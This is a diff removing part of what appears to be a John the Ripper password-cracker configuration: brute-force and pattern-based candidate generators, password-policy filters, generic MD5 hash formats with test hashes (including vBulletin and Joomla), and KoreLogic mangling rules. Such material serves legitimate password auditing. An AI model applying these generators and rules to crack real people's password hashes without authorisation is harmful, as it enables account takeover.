-	minlength = 1;	// Initial password length to try, must be at least 1
-	maxlength = 7;	// Must be at least same as minlength
-
-/*
- * This defines the character set.
- *
- * Let's say, we want to try TAB, all non-control ASCII characters, and all
- * 8-bit characters, including the 8-bit terminal controls range (as these are
- * used as regular national characters with some 8-bit encodings), but except
- * for known terminal controls (risky for the terminal we may be running on).
- *
- * Also, let's say our hashes are case-insensitive, so skip lowercase letters
- * (this is right for LM hashes).
- */
-	i = 0;
-	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
-	c = ' ';			// start with space (ASCII 32) and
-	while (c < 'a')			// proceed till lowercase 'a'
-		charset[i++] = c++;
-	c = 'z' + 1;			// Skip lowercase letters and
-	while (c <= 0x7e)		// proceed for all printable ASCII
-		charset[i++] = c++;
-	c++;				// Skip DEL (ASCII 127) and
-	while (c < 0x84)		// proceed over 8-bit codes till IND
-		charset[i++] = c++;
-	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
-	charset[i++] = 0x87;
-	c = 0x89;			// Skip HTS (88 hex)
-	while (c < 0x8d)		// Proceed till RI (8D hex)
-		charset[i++] = c++;
-	c = 0x91;			// Skip RI, SS2, SS3, DCS
-	while (c < 0x96)		// Proceed till SPA (96 hex)
-		charset[i++] = c++;
-	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
-	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
-	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
-		charset[i++] = c++;
-
-/* Zero-terminate it, and cache the first character */
-	charset[i] = 0;
-	c0 = charset[0];
-
-	last = minlength - 1;
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = -1;
-	word[i] = 0;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = charset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-	} else				// We're done
-		word = 0;
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = 0; while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = 0;	// Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Generic implementation of exhaustive search for a partially-known password.
-# This is pre-configured for length 8, lowercase and uppercase letters in the
-# first 4 positions (52 different characters), and digits in the remaining 4
-# positions - however, the corresponding part of init() may be modified to use
-# arbitrary character sets or even fixed characters for each position.
-[List.External:KnownForce]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Password length to try
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < 4) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a';
-		while (c <= 'z')
-			charset[ofs + i++] = c++;
-		c = 'A';
-		while (c <= 'Z')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# A variation of KnownForce configured to try likely date and time strings.
-[List.External:DateTime]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Must be one of: 4, 5, 7, 8
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < length - 6) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	if (pos) {
-		ofs = pos++ << 8;
-		charset[ofs] = '/';
-		charset[ofs + 1] = '.';
-		charset[ofs + 2] = ':';
-		charset[ofs + 3] = 0;
-	}
-	while (pos < length - 3) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	ofs = pos++ << 8;
-	charset[ofs] = '/';
-	charset[ofs + 1] = '.';
-	charset[ofs + 2] = ':';
-	charset[ofs + 3] = 0;
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Try strings of repeated characters.
-[List.External:Repeats]
-int minlength, maxlength, minc, maxc, length, c;
-
-void init()
-{
-	minlength = 1;
-	maxlength = 72;
-	minc = 0x20;
-	maxc = 0xff;
-
-	length = minlength; c = minc;
-}
-
-void generate()
-{
-	int i;
-
-	i = 0;
-	while (i < length)
-		word[i++] = c;
-	word[i] = 0;
-
-	if (c++ < maxc)
-		return;
-
-	c = minc;
-	if (++length > maxlength)
-		c = 0; // Will NUL out the next "word" and thus terminate
-}
-
-# Generate candidate passwords from many small subsets of characters from a
-# much larger full character set.  This will test for passwords containing too
-# few different characters.  As currently implemented, this code will produce
-# some duplicates, although their number is relatively small when the maximum
-# number of different characters (the maxdiff setting) is significantly lower
-# than the maximum length (the maxlength setting).  Nevertheless, you may want
-# to pass the resulting candidate passwords through "unique" if you intend to
-# test them against hashes that are salted and/or of a slow to compute type.
-[List.External:Subsets]
-int minlength;		// Minimum password length to try
-int maxlength;		// Maximum password length to try
-int startdiff;		// Initial number of characters in a subset to try
-int maxdiff;		// Maximum number of characters in a subset to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int subset[0x100], c0;	// Current subset
-int subcount;		// Number of characters in the current subset
-int subid[0x100];	// Indices into charset[] of characters in subset[]
-int charset[0x100];	// Full character set
-int charcount;		// Number of characters in the full charset
-
-void init()
-{
-	int i, c;
-
-	minlength = 1;	// Minimum password length to try, must be at least 1
-	maxlength = 8;	// Must be at least same as minlength
-
-	startdiff = 1;	// Initial number of different characters to try
-	maxdiff = 3;	// Maximum number of different characters to try
-
-/* This defines the character set */
-	i = 0;
-	c = 0x20;
-	while (c <= 0x7e)
-		charset[i++] = c++;
-
-	if (maxdiff > (charcount = i))
-		maxdiff = i;
-	if (maxdiff > maxlength)
-		maxdiff = maxlength;
-
-/*
- * Initialize the variables such that generate() gets to its "next subset"
- * code, which will initialize everything for real.
- */
-	subcount = (i = startdiff) - 1;
-	while (i--)
-		subid[i] = charcount;
-	subset[0] = c0 = 0;
-	last = maxlength - 1;
-	lastid = -1;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = subset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = subset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-		return;
-	}
-
-/* Next subset */
-	if (subcount) {
-		int j;
-		i = subcount - 1;
-		j = charcount;
-		while (++subid[i] >= j) {
-			if (i--) {
-				j--;
-				continue;
-			}
-			subid[i = 0] = 0;
-			subset[++subcount] = 0;
-			break;
-		}
-	} else {
-		subid[i = 0] = 0;
-		subset[++subcount] = 0;
-	}
-	subset[i] = charset[subid[i]];
-	while (++i < subcount)
-		subset[i] = charset[subid[i] = subid[i - 1] + 1];
-
-	if (subcount > maxdiff) {
-		word = 0;		// Done
-		return;
-	}
-
-/*
- * We won't be able to fully use the subset if the length is smaller than the
- * character count.  We assume that we've tried all smaller subsets before, so
- * we don't bother with such short lengths.
- */
-	if (minlength < subcount)
-		last = subcount - 1;
-	else
-		last = minlength - 1;
-	c0 = subset[0];
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = 0;
-	word[i] = 0;
-}
-
-# Simple password policy matching: require at least one digit.
-[List.External:AtLeast1-Simple]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-		if (c >= '0' && c <= '9')
-			return; // Found at least one suitable character, good
-
-	word = 0; // No suitable characters found, skip this "word"
-}
-
-# The same password policy implemented in a more efficient and more generic
-# fashion (easy to expand to include other "sufficient" characters as well).
-[List.External:AtLeast1-Generic]
-int mask[0x100];
-
-void init()
-{
-	int c;
-
-	mask[0] = 0; // Terminate the loop in filter() on NUL
-	c = 1;
-	while (c < 0x100)
-		mask[c++] = 1; // Continue looping in filter() on most chars
-
-	c = '0';
-	while (c <= '9')
-		mask[c++] = 0; // Terminate the loop in filter() on digits
-}
-
-void filter()
-{
-	int i;
-
-	i = -1;
-	while (mask[word[++i]])
-		continue;
-	if (word[i])
-		return; // Found at least one suitable character, good
-
-	word = 0; // No suitable characters found, skip this "word"
-}
-
-# An efficient and fairly generic password policy matcher.  The policy to match
-# is specified in the check at the end of filter() and in mask[].  For example,
-# lowercase and uppercase letters may be treated the same by initializing the
-# corresponding mask[] elements to the same value, then adjusting the value to
-# check "seen" for accordingly.
-[List.External:Policy]
-int mask[0x100];
-
-void init()
-{
-	int c;
-
-	mask[0] = 0x100;
-	c = 1;
-	while (c < 0x100)
-		mask[c++] = 0x200;
-
-	c = 'a';
-	while (c <= 'z')
-		mask[c++] = 1;
-	c = 'A';
-	while (c <= 'Z')
-		mask[c++] = 2;
-	c = '0';
-	while (c <= '9')
-		mask[c++] = 4;
-}
-
-void filter()
-{
-	int i, seen;
-
-/*
- * This loop ends when we see NUL (sets 0x100) or a disallowed character
- * (sets 0x200).
- */
-	i = -1; seen = 0;
-	while ((seen |= mask[word[++i]]) < 0x100)
-		continue;
-
-/*
- * We should have seen at least one character of each type (which "add up"
- * to 7) and then a NUL (adds 0x100), but not any other characters (would
- * add 0x200).  The length must be 8.
- */
-	if (seen != 0x107 || i != 8)
-		word = 0; // Does not conform to policy
-}
-
-# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
-# for speed, not for size nor simplicity.  The primary optimization trick is to
-# compute the length and four sums in parallel (in two SIMD'ish variables).
-# Then whether the length is even or odd determines which two of the four sums
-# are actually used.  Checks for non-digits and for NUL are packed into the
-# SIMD'ish bitmasks as well.
-[List.External:AppendLuhn]
-int map1[0x100], map2[0x1fff];
-
-void init()
-{
-	int i;
-
-	map1[0] = ~0x7fffffff;
-	i = 1;
-	while (i < 0x100)
-		map1[i++] = ~0x7effffff;
-	i = -1;
-	while (++i < 10)
-		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
-	i = -1;
-	while (++i < 0x1fff) {
-		if (i % 10)
-			map2[i] = '9' + 1 - i % 10;
-		else
-			map2[i] = '0';
-	}
-}
-
-void filter()
-{
-	int i, o, e;
-
-	i = o = e = 0;
-	while ((o += map1[word[i++]]) >= 0) {
-		if ((e += map1[word[i++]]) >= 0)
-			continue;
-		if (e & 0x01000000)
-			return; // Not all-digit, leave unmodified
-		word[i--] = 0;
-		word[i] = map2[(e & 0xfff) + (o >> 12)];
-		return;
-	}
-	if (o & 0x01000000)
-		return; // Not all-digit, leave unmodified
-	word[i--] = 0;
-	word[i] = map2[(o & 0xfff) + (e >> 12)];
-}
-
-# Here are some examples of GENERIC-MD5.
-# Please refer to doc/MD5_GENERIC for documentation on how to set these up.
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^4  (i.e. 4 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1001)]
-# expression shown will be the string:   md5_gen(1001) md5(md5(md5(md5($p))))
-Expression=md5(md5(md5(md5($p))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 4 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-Test=md5_gen(1001)57200e13b490d4ae47d5e19be026b057:test1
-Test=md5_gen(1001)c6cc44f9e7fb7efcde62ba2e627a49c6:thatsworking
-Test=md5_gen(1001)0ae9549604e539a249c1fa9f5e5fb73b:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^5  (i.e. 5 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1002)]
-# expression shown will be the string:   md5_gen(1002) md5(md5(md5(md5(md5($p)))))
-Expression=md5(md5(md5(md5(md5($p)))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 5 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1002)25de8cd0b0cf69c5b5bc19c8ee64adab:test1
-Test=md5_gen(1002)a0b535420ea47849f7c2cc09a3ad0ac3:thatsworking
-Test=md5_gen(1002)4cb029bd5b4ef79f785ca685caf17bf8:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5(md5($p).md5($p))
-####################################################################
-[List.Generic:md5_gen(1003)]
-# expression shown will be the string:   md5_gen(1003) md5(md5($p).md5($p))
-Expression=md5(md5($p).md5($p))
-# NOTE, this format does NOT work on SSE2.  It requires a md5() of a 64 byte string.
-# SSE (or MMX) is limtited to 54 byte max password, due to 'enhancements'
-# Thus, we need a non-sse2 safe flag.
-Flag=MGF_NOTSSE2Safe
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform hash 'like' IPB but salt replaced with password.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1003)478b10974f15e7295883224fd286ccba:test1
-Test=md5_gen(1003)18a59101e6c6fb38260d542a394ecb22:thatsworking
-Test=md5_gen(1003)630b01b68b6db6fd43a751f8147d1faf:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^6  (i.e. 6 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1004)]
-# expression shown will be the string:   md5_gen(1004) md5(md5(md5(md5(md5(md5($p))))))
-Expression=md5(md5(md5(md5(md5(md5($p))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 6 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1004)de1b991dd27fb9813e88b957a455dccd:test1
-Test=md5_gen(1004)6a62cd3c4d81139f61fb2553cdef0dc7:thatsworking
-Test=md5_gen(1004)a977990e521c5d1d17c6d65fdf2681b4:test3
-
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^7  (i.e. 7 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1005)]
-# expression shown will be the string:   md5_gen(1005) md5(md5(md5(md5(md5(md5(md5($p)))))))
-Expression=md5(md5(md5(md5(md5(md5(md5($p)))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 7 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1005)784c527d0d92873ff9c0773e1c35621d:test1
-Test=md5_gen(1005)efcbbe6331caecf0e7f40160e65aadcc:thatsworking
-Test=md5_gen(1005)abb8bdd2c6ac2dfea2b2af6f5aed5446:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^8  (i.e. 8 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1006)]
-# expression shown will be the string:   md5_gen(1006) md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
-Expression=md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 8 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1006)1ec1f32398f64cab51183f63630eceea:test1
-Test=md5_gen(1006)f66b339ac21d6fd6af216f2b70aab2c9:thatsworking
-Test=md5_gen(1006)e9d38522b5eeec753332e576e2e0fe5d:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for vBulletin md5(md5($p).$s)   Included here to 'exercise' the script parser
-####################################################################
-[List.Generic:md5_gen(1007)]
-# expression shown will be the string:   md5_gen(1007) md5(md5($p).$s) [vBulletin]
-Expression=md5(md5($p).$s) [vBulletin]
-# Flag needed here, is Salt.  There is no 'fixed' saltlen.
-Flag=MGF_SALTED
-Flag=MGF_ColonNOTValid
-Flag=MGF_KEYS_BASE16_IN1
-# vBulletin has a 'fixed' 3 byte salt, so list the fixed size
-SaltLen=3
-ColonChar=;
-# here is the optimized 'script' to perform vBulletin hash
-Func=MD5GenBaseFunc__set_input_len_32
-Func=MD5GenBaseFunc__append_salt
-Func=MD5GenBaseFunc__crypt
-# NOTE, vBulletin is setup to 'override' the ':'.  USUALLY, it is good to use something
-# outside of the ASCII values from 0x20 to 0x7F.  0x1F is a 'good' choice, but it will
-# cause john.conf to have a 'non-normal' ASCII char.  Thus for this 'simple' example, I
-# have used the ';' character.  NOTE this would have the same 'problems' as the ':' character
-# if used for real, since ; is also a valid character within the salt of vBulletin.
-# NOTE to run, you MUST use the command line switch:   -field-separator-char=;
-Test=md5_gen(1007)daa61d77e218e42060c2fa198ac1feaf$SXB;test1
-Test=md5_gen(1007)de56b00bb15d6db79204bd44383469bc$T &;thatsworking
-Test=md5_gen(1007)fb685c6f469f6e549c85e4c1fb5a65a6$\\H:;test3
-
-####################################################################
-# Simple GENERIC-MD5 type for joomla md5($p.$s)   Included here to 'exercise' the script parser
-####################################################################
-[List.Generic:md5_gen(1008)]
-# expression shown will be the string:   md5_gen(1008) md5($p.$s) [joomla]
-Expression=md5($p.$s) [joomla]
-# Flag needed here, is Salt.  There is no 'fixed' saltlen.
-Flag=MGF_SALTED
-# here is the optimized 'script' to perform the md5 8 times on itself.
-Func=MD5GenBaseFunc__clean_input
-Func=MD5GenBaseFunc__append_keys
-Func=MD5GenBaseFunc__append_salt
-Func=MD5GenBaseFunc__crypt
-Test=md5_gen(1008)ed52af63d8ecf0c682442dfef5f36391$1aDNNojYGSc7pSzcdxKxhbqvLtEe4deG:test1
-Test=md5_gen(1008)4fa1e9d54d89bfbe48b4c0f0ca0a3756$laxcaXPjgcdKdKEbkX1SIjHKm0gfYt1c:thatsworking
-Test=md5_gen(1008)82568eeaa1fcf299662ccd59d8a12f54$BdWwFsbGtXPGc0H1TBxCrn0GasyAlJBJ:test3
-
-
-[List.Rules:KoreLogicRules]
-
-;[List.Rules:KoreLogicRulesPrependNumNum]
-[c:] \p[c:] A0"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrependYears]
-A0"20[0-1][0-9]"
-A0"19[3-9][0-9]"
-
-# Notice: Your wordlist should likely be all lowercase - or you are wasting work
-;[List.Rules:KoreLogicRulesAppendYears]
-[c:] \p[c:] Az"19[0-9][0-9]" <+
-[c:] \p[c:] Az"20[01][0-9]" <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumNum]
-[c:] \p[c:] A0"[0-9][0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesMonthsFullPreface]
-[:c] A0"\p[jJ]anuary"
-[:c] A0"\p[fF]ebruary"
-[:c] A0"\p[mM]arch"
-[:c] A0"\p[aA]pril"
-[:c] A0"\p[mM]ay"
-[:c] A0"\p[jJ]uner"
-[:c] A0"\p[jJ]uly"
-[:c] A0"\p[aA]ugust"
-[:c] A0"\p[sS]eptember"
-[:c] A0"\p[oO]ctober"
-[:c] A0"\p[nN]ovember"
-[:c] A0"\p[dD]ecember"
-
-;[List.Rules:KoreLogicRulesPrepend4LetterMonths]
-## Preface each dictionary with Janu janu Febr febr
-[:c] A0"\p[jJ]anu"
-[:c] A0"\p[fF]ebr"
-[:c] A0"\p[mM]arc"
-[:c] A0"\p[aA]pr"
-[:c] A0"\p[mM]ay"
-[:c] A0"\p[jJ]une"
-[:c] A0"\p[jJ]uly"
-[:c] A0"\p[Aa]ugu"
-[:c] A0"\p[sS]ept"
-[:c] A0"\p[oO]cto"
-[:c] A0"\p[nN]ove"
-[:c] A0"\p[Dd]ece"
-
-# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
-;[List.Rules:KoreLogicRulesPrependSeason]
-A0"[Ss$][uU][mM][mM][eE3][rR]"
-A0"[Ww][iI|][nN][tT+][eE3][rR]"
-A0"[Ff][aA][lL][lL]"
-A0"[Ss][pP][rR][iI][nN][gG]"
-A0"[Aa][uU][tT][uU][mM][nN]"
-
-# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
-;[List.Rules:KoreLogicRulesAppendSeason]
-<* Az"[Ss$][uU][mM][mM][eE3][rR]"
-<* Az"[Ww][iI|][nN][tT+][eE3][rR]"
-<* Az"[Ff][aA][lL][lL]"
-<* Az"[Ss][pP][rR][iI][nN][gG]"
-<* Az"[Aa][uU][tT][uU][mM][nN]"
-
-;[List.Rules:KoreLogicRulesPrependHello]
-A0"[hH][eE][lL][lL][oO0]"
-
-# Notice how we
-# 1) do caps first b/c they are more common in 'complex' environments
-# 2) Do !$@#%. first b/c they are the most common special chars
-;[List.Rules:KoreLogicRulesAppendCurrentYearSpecial]
-[c:] \p[c:] Az"201[0-9][!$@#%.]" <+
-[c:] \p[c:] Azq201[0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecial]
-[c:] \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend2Letters]
-<- Az"[a-z][a-z]"
-c <- Az"[A-Z][A-Z]"
-c <- Az"[a-z][A-Z]"
-c <- Az"[A-Z][a-z]"
-
-# Append numbers - but limit the total length.
-;[List.Rules:KoreLogicRulesAddJustNumbers]
-[c:] <* >1 \p[c:] $[0-9]
-[c:] <* >1 \p[c:] ^[0-9]
-[c:] <- >1 \p[c:] Az"[0-9][0-9]"
-[c:] <- >1 \p[c:] A0"[0-9][0-9]"
-[c:] >1 \p[c:] Az"[0-9][0-9][0-9]" <+
-# Redundant with KoreLogicRulesAppend4Num
-;-[c:] >1 \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesDevProdTestUAT]
-\r[::cc] <* A\p\r[0l0l]"dev" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"uat" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"prod" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"test" \p\r[::TT]\p\r[::0l]
-
-;[List.Rules:KoreLogicRulesPrependAndAppendSpecial]
-[c:] <- \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-# Redundant with KoreLogicRulesAddJustNumbers and KoreLogicRulesAppend4Num
-;[List.Rules:KoreLogicRulesAppendJustNumbers]
-;-[c:] <* \p[c:] $[0-9]
-;-[c:] <- \p[c:] Az"[0-9][0-9]"
-;-[c:] \p[c:] Az"[0-9][0-9][0-9]" <+
-;-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple]
-# cap first letter then add a 0  2 6 9 ! *  to the end
-[c:] <* \p[c:] $[0-9!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-# cap first letter then add a special char - THEN a number  !0 %9 !9 etc
-[c:] <- \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
-# Cap the first letter - then add 0? 0! 5_ .. 9!
-## add NUMBER then SPECIAL    1! .. 9?
-[c:] <- \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
